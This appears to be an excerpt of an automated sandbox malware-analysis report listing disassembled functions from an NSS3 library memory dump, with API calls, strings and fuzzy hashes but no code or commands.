Part of subcall function 6C6E6E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C6E6F18
Part of subcall function 6C6E6E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C6E6BF7), ref: 6C6E6F30
Part of subcall function 6C6E6E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C6E6BF7), ref: 6C6E6F54

TlsGetValue.KERNEL32 ref: 6C6E6D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C6E6BF7), ref: 6C6E6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C6E6BF7), ref: 6C6E6FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6C6E6FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C6E6FDB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 66250cf380fa8e3804e484c8e0e808ff7bed07b1c8bde0631b78cda2c59d952b
Instruction ID: f07cbaa586f6b803c62fc447238fd8d14d9c1afd23f773c9ca28c6ecad2881f9
Opcode Fuzzy Hash: 66250cf380fa8e3804e484c8e0e808ff7bed07b1c8bde0631b78cda2c59d952b
Instruction Fuzzy Hash: 2171E0B068E5488BDB189E3CC6A69A437F1A75F308740412BDA538ABD1D630E443C75E

Function 6C630820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C6311D2

Strings

not authorized, xrefs: 6C63175E, 6C631763
authorizer malfunction, xrefs: 6C631BD2
rows deleted, xrefs: 6C6317D2
@, xrefs: 6C630B17

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: ab150fe4c757217e5993931a95fe85b75e0cb09b48ef807d7e43d3010e0c39ba
Instruction ID: b3501d3529e96deb0313036fbbc91e4a16332001abbfecd437ac54111242eeb7
Opcode Fuzzy Hash: ab150fe4c757217e5993931a95fe85b75e0cb09b48ef807d7e43d3010e0c39ba
Instruction Fuzzy Hash: 68D29C70E04269CFDB14CFA9C884B9DBBF1BF49308F24A169D419ABB51D771E846CB84

Function 6C6FC9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C6FCEA5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: 71c475b8f5a6fd263488c4f13936c586e54eba71808cdf284c8b8644d93e9ce7
Instruction ID: cea9574bbec39f50ec41898fb6acbe0c224795cefac8a93450c9a6f62e783358
Opcode Fuzzy Hash: 71c475b8f5a6fd263488c4f13936c586e54eba71808cdf284c8b8644d93e9ce7
Instruction Fuzzy Hash: 387182719057019FC714CF28C48061ABBE6FF89314F258A2DE479C77A0E730E956CB55

Function 6C76CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76D086
PR_Malloc.NSS3(00000001), ref: 6C76D0B9
PR_Free.NSS3(?), ref: 6C76D138

Strings

>, xrefs: 6C76CF5B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: dadeca0df0336e890a93f9c09d5546fdac01e6f59edf48890e3e18a2e203b027
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 9DD18A32B506460BEF18487F8EA13EA77938762374F784339DD618BFE5E65888438305

Function 6C5EAC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

0vl, xrefs: 6C5EACC0, 6C5EAD22, 6C5EAD5E, 6C5EAE45
Pvl, xrefs: 6C5EADDB, 6C5EADF5, 6C5EAE6A
winUnlockReadLock, xrefs: 6C5EAE9F
pvl, xrefs: 6C5EADA7
winUnlock, xrefs: 6C5EAE18

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID: 0vl$Pvl$pvl$winUnlock$winUnlockReadLock
API String ID: 0-792151856
Opcode ID: e20b9e19ba0afe291d9b8cee9bc22bb4791b3380891b8ef03cf62bb322d0ebc0
Instruction ID: eecee8da5ac6bf1c60882fbbe5d7e3ac746ab80e53bce509b454173c4e46b59e
Opcode Fuzzy Hash: e20b9e19ba0afe291d9b8cee9bc22bb4791b3380891b8ef03cf62bb322d0ebc0
Instruction Fuzzy Hash: E671BD706083449FDB04CF28E894AAABBF5FF89304F14CA28F95997351E730A985CBD1

Function 6C70AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794bfaa1980d3c154a5c416d9e425536d3842891f06a5ee8c1baa9c35b8d8776
Instruction ID: 26f18300c447125f1e7eb02779cb283940893cb3118e5255baca8150d3083427
Opcode Fuzzy Hash: 794bfaa1980d3c154a5c416d9e425536d3842891f06a5ee8c1baa9c35b8d8776
Instruction Fuzzy Hash: A5F1E1B1F012598BDB04CFA9DA547AE77F0AB8A308F25823DD905D7B44E770AA51CBC4

Function 6C6C0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C6C1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C6C1086

Strings

h(ll, xrefs: 6C6C1062, 6C6C105D, 6C6C0F37, 6C6C1081, 6C6C1082
h(ll, xrefs: 6C6C0E55, 6C6C0EC4, 6C6C0F3A, 6C6C0FA7

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(ll$h(ll
API String ID: 1297977491-1774252009
Opcode ID: 67f5b1fcb83da880fb63f573082336db8c87943e3a4081e198a5746fec37010d
Instruction ID: 8cacc4eec63e3fbaf3f0f4d0275ff84627187728bee462977504022fabc56833
Opcode Fuzzy Hash: 67f5b1fcb83da880fb63f573082336db8c87943e3a4081e198a5746fec37010d
Instruction Fuzzy Hash: 91A14BB1B0125A9FCF08CF99C894AEEBBB6FF4C314B148129E914A7700D735AD41CBA5

Function 6C636900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C6378EC, 6C6378F1
sqlite\_%, xrefs: 6C636953
authorizer malfunction, xrefs: 6C637910
BBB, xrefs: 6C637207, 6C63780B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: e25fc998a29c0057ff65c69f86d0c27f9603e75159e76af14c5ee41253b08196
Instruction ID: bc22479840981c9d2d1808242c9762c8908d0ac357da1d329c265bd4d6c02d67
Opcode Fuzzy Hash: e25fc998a29c0057ff65c69f86d0c27f9603e75159e76af14c5ee41253b08196
Instruction Fuzzy Hash: 57C29170A04215CFCB14CF58C980AA9BBF2FF89308F2491ADD919AB751D736E916CF94

Function 6C5E4DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

0vl, xrefs: 6C5E4EDE, 6C5E4F82
Pvl, xrefs: 6C5E5019, 6C5E50FA, 6C5E5157, 6C5E51DE, 6C5E51F2, 6C5E520D, 6C5E5220, 6C5E52A2, 6C5E52B5
winUnlockReadLock, xrefs: 6C5E5125
pvl, xrefs: 6C5E4E1C, 6C5E4E81, 6C5E4FDE, 6C5E5047, 6C5E50BB, 6C5E51A3, 6C5E526C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID: 0vl$Pvl$pvl$winUnlockReadLock
API String ID: 0-1853705913
Opcode ID: 0ed5cc44f3942988c63461552229b44bce89009f2c210b17fd9df82dd5d138e0
Instruction ID: 3cbedef075596b0c078a03242bfe68d756f01b628b04aabbd222c3718a377c1c
Opcode Fuzzy Hash: 0ed5cc44f3942988c63461552229b44bce89009f2c210b17fd9df82dd5d138e0
Instruction Fuzzy Hash: 25E12B70A18344CFDB04DF28E89865ABBF0FF89304F558A6DF89997351E7309985CB82

Function 6C5E6F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

noskipscan*, xrefs: 6C5E7067
*?[, xrefs: 6C5E7034, 6C5E7052, 6C5E7070
sz=[0-9]*, xrefs: 6C5E7049
unordered*, xrefs: 6C5E702B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: f0f4bade09ec0670cfc77a1599e0919988e2e42272c72179ebe5f85bfa625548
Instruction ID: 92c49b672d14e46bbccf307794f265cacb030f5e1c0adf67c6e2e1a140b3a08a
Opcode Fuzzy Hash: f0f4bade09ec0670cfc77a1599e0919988e2e42272c72179ebe5f85bfa625548
Instruction Fuzzy Hash: FC716C32F043154BEB14CE6DCC8039E77A29F89394F250678CD69ABBC6EA719C4687C1

Function 6C720B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6C720B7C
sqlite3_bind_double.NSS3 ref: 6C720BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6C720C27

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
Opcode ID: 99d2f440adbd6d02fad0c548d47e2a7f662975923627160b1ff6ffad3990a5fe
Instruction ID: 3038ff7fe5566ed05d853a0a4d59f81572455f17a5fb2d00c21427a790dd51d6
Opcode Fuzzy Hash: 99d2f440adbd6d02fad0c548d47e2a7f662975923627160b1ff6ffad3990a5fe
Instruction Fuzzy Hash: 152176729489549FD7015B188D24D6BB7B9EF8B338F1982A4F8940B792DB34A801C7F6

Function 6C67EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C67F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C67F0F9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: cf8c58d72dda11d0174f5d3a0c4087572fa7c75b649267e6ecac87be26bd1c5c
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 69919375A0061A8FCB24CF68C891AAEB7F1FF85324F244B2DD56297BC0D730A905CB65

Function 6C6A2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C6C7929), ref: 6C6A2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C6C7929), ref: 6C6A2FE0

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 4a656108be18da6d47c24cc2c8ac13f526c4c1b274535cb3a5808e77de7152a1
Instruction ID: 9ab6f43318753b15c120202def51ddfa4001fcb99b837c426b889048feaa219a
Opcode Fuzzy Hash: 4a656108be18da6d47c24cc2c8ac13f526c4c1b274535cb3a5808e77de7152a1
Instruction Fuzzy Hash: 2E512671A459118FD714CEEAC880BAAB3B1FF46318F250139D9199BB02D731ED47CB89

Function 6C6149F0 Relevance: 1.9, APIs: 1, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59add3abc00a9f1fe209479863eb32586475fdbe9f2c824c351cc2790b41e53c
Instruction ID: ad93ee2283ed96544ba1c532f841e83c99430f1d92c34890a99b7b20776560ef
Opcode Fuzzy Hash: 59add3abc00a9f1fe209479863eb32586475fdbe9f2c824c351cc2790b41e53c
Instruction Fuzzy Hash: 34528A74E082098FDB04CF59C480BAEBBF2FF89319F258259D814ABB55D775E842CB94

Function 6C6AED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C6AEE3D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 8f9cf25bb5696d1cf8ac485a989272bafbf98db9796f59bfbbe95dc0a453724e
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: FE71CFB2E01B018BD718CF99C8806AAB7F2FB89304F14862DD85697B91D734ED12CB95

Function 6C64EBF0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C64EC05

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b45fbce6d16dfbc7d76712a665ecc50d74edde8aaef0a5886dfccbc72552bddd
Instruction ID: 00d18f6e07072eddb8172ad0b05eb551d8525a4ab89ffb488158def061ea40d9
Opcode Fuzzy Hash: b45fbce6d16dfbc7d76712a665ecc50d74edde8aaef0a5886dfccbc72552bddd
Instruction Fuzzy Hash: 5FE0C231A0021C6B8B00AFA9E8444CFB7B8EF0D210B400465D9066B300EA2179488BE2

Function 6C66A820 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

[[el, xrefs: 6C66A92D, 6C66A943

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID:
String ID: [[el
API String ID: 0-19866751
Opcode ID: 5336f25a2f593645abb33035a302ff9f1d745ece41cc1ca0ea70aaac9bcee920
Instruction ID: c16adc151fedc426b6b19e0c24e62ccca2dee5581dd156d073c2aff92e0dde73
Opcode Fuzzy Hash: 5336f25a2f593645abb33035a302ff9f1d745ece41cc1ca0ea70aaac9bcee920
Instruction Fuzzy Hash: 0151BE71A01229CFDB04CF16D944BAABBF5FF49308F26816DE81A8BB52D730D851CB95

Function 6C618960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
